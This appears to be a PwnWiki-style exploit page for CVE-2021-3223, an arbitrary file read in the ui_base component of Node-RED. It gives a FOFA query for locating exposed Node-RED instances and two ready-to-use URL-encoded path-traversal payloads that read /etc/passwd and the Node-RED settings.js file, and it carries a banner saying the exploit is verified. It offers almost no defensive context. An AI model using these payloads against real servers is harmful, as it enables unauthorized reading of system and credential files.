CVE-2021-3223_Node-RED_ui_base_任意文件讀取漏洞_en

# CVE-2021-3223 Node-RED ui base 任意文件讀取漏洞/en


{| style=”border: 2.0px solid grey; background: #b3ff9c;” width=”85%”
| align=”center” width=”60px”| ![](/static/pwnwiki/img/Check.png)
| align=”center” |”’The vulnerability has been verified”’
——
The EXP/POC/Payload on this page has been tested and available, and the vulnerability has been successfully reproduced.
|}

==Vulnerability Impact==
Node-RED

==FOFA==

title="Node-RED"

==POC==

/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/ui_base/js/..%2f..%2f..%2f..%2fsettings.js

==Reference==
https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAeg

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容